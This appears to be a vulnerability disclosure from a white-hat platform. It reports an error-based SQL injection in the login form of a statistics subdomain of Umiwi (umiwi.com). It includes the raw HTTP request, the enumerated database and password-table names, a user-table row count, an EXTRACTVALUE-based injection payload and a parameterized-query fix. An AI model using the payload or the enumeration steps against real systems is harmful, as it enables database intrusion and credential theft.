2015-01-13: Details reported to the vendor, awaiting vendor response
2015-01-13: Vendor confirmed; details visible to the vendor only
2015-01-23: Details opened to core white hats and relevant domain experts
2015-02-02: Details opened to regular white hats
2015-02-12: Details opened to intern white hats
2015-02-27: Details opened to the public
MySQL error-based SQL injection on a Umiwi (优米网) site (890,000 user records); a large number of tables, including ones holding user passwords, can be read.
Injection point:

POST /access/login.php HTTP/1.1
Content-Length: 380
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=a6db3261e08cbfeb81757f1c709d304a
Host: stats.cn.umiwi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Submit=Login&login=*&password=test&remember=yes

The login parameter is injectable (the * in login=* marks where the payload goes). The injection is error-based: the database error text is returned in the response, so query results can be read back through it.
146 rows for tables that contain a column with "pass" in its name. The query and its output, grouped here by schema:

select table_name, TABLE_SCHEMA from information_schema.columns where column_name like '%pass%'; [146]:

angel: user, user_admin
bbs: cdb_forumfields, cdb_members, pre_common_member, pre_forum_forumfield, pre_home_album, pre_home_blog, pre_ucenter_members
book: user
callcenter: agent
cmstop: cmstop_dsn, cmstop_member, cmstop_tweets
faq: faqfaquserlogin
finance_online: card
forum: pre_common_member, pre_common_plugin_cnzz_user, pre_forum_forumfield, pre_home_album, pre_home_blog, pre_ucenter_members
mysql: user
passport: uc_members, user
supersite: supe_members, supe_spaceitems
ucenter: uc_m_bak, uc_members
umiwi: admin, user, user_view
umv: user
userengine: user_0 through user_99 (100 sharded tables)
v_online: game (returned 12 times, once per matching column), tutorpoint

Because the query runs against information_schema.columns, a table is returned once per matching column, so 146 is a row count rather than a count of distinct tables.
One of the user tables holds 890,000 rows, including the password column (stored as ciphertext, not plaintext):

Database: umiwi
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 894438  |
+--------+---------+
The userengine database is sharded into 100 tables, which also puts the user count at roughly 980,000. Databases:

available databases [28]:
[*] angel
[*] apns
[*] bbs
[*] bbs1
[*] book
[*] callcenter
[*] celebrity
[*] ceshi
[*] chuangxin
[*] cmstop
[*] dataanalysis
[*] faq
[*] finance_online
[*] forum
[*] information_schema
[*] ipadapns
[*] logdb
[*] mysql
[*] passport
[*] rating
[*] stats
[*] supersite
[*] ucenter
[*] umiwi
[*] umv
[*] userengine
[*] v_online
[*] weibo

The single database account used by stats.cn.umiwi.com can read every one of these schemas, including mysql and the forum, passport and ucenter user stores, so one injectable parameter on an unused statistics site exposes the credentials of the whole platform.
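The enumeration above, written out as standalone MySQL, together with the shape of an error-based payload for the login parameter and the query-side fix. This is an added example and not code from the original report or from the site: the schema and table names are taken from the report's output, while the EXTRACTVALUE wrapper, the assumption that the vulnerable statement encloses the login value in single quotes, and the columns id and login on umiwi.user are illustrative assumptions.

```sql
-- Added example (not from the original report). Schema/table names are the
-- report's; the payload wrapper and the umiwi.user column names are assumptions.

-- 1. Tables with a password-like column. DISTINCT collapses tables that have
--    several matching columns (the report's raw output lists v_online.game
--    12 times, once per column), so this returns distinct tables, not rows.
SELECT DISTINCT table_schema, table_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
ORDER BY table_schema, table_name;

-- 2. Row estimate for the sharded store userengine.user_0 .. user_99 in one
--    statement. table_rows is an estimate for InnoDB tables, so read the
--    result as an order of magnitude (the report's "roughly 980,000").
--    The backslash keeps '_' literal instead of acting as a LIKE wildcard.
SELECT table_schema, COUNT(*) AS shards, SUM(table_rows) AS approx_rows
FROM information_schema.tables
WHERE table_schema = 'userengine' AND table_name LIKE 'user\_%'
GROUP BY table_schema;

-- 3. How one row of query 1 leaves the server through an error message.
--    EXTRACTVALUE() rejects an XPath expression that starts with '~' and
--    echoes it back verbatim: "XPATH syntax error: '~<schema>.<table>'".
--    Only about 32 characters fit in one error, hence LIMIT 1 OFFSET n to
--    walk the rows and SUBSTRING() for longer values. Injected into the
--    vulnerable statement the same expression would be sent as
--        login=' AND EXTRACTVALUE(1, CONCAT(0x7e, (...))) AND '1'='1
SELECT EXTRACTVALUE(1, CONCAT(0x7e,
  (SELECT CONCAT(table_schema, '.', table_name)
   FROM information_schema.columns
   WHERE column_name LIKE '%pass%'
   LIMIT 1 OFFSET 0)));

-- 4. The fix on the query side: bind the login value instead of splicing it
--    into the SQL text. Shown with a MySQL server-side prepared statement;
--    the application does the same through its driver (PDO/mysqli bindings
--    in PHP). The payload is compared as an ordinary string: no error is
--    raised and no row matches.
SET @login = '\' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT VERSION()))) AND \'1\'=\'1';
PREPARE login_stmt FROM 'SELECT id FROM umiwi.user WHERE login = ? LIMIT 1';
EXECUTE login_stmt USING @login;
DEALLOCATE PREPARE login_stmt;
```

Binding alone closes the injection; the second half of the problem is that the error text reached the browser at all, so the application should also stop echoing database errors to users, and the statistics site's database account should be limited to the stats schema rather than the whole server.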
Suggested fix: parameter filtering
Severity: High
Vulnerability rank: 10
Confirmed: 2015-01-13 16:30
Vendor response: Thank you for the test. This site is an abandoned one and has already been shut down.
Additional notes: None
No script, no fun.
Error-based injection doesn't need a script.
Does the OP work at iQiyi?
Came to see Xiaochuan.
Sister Li is my idol.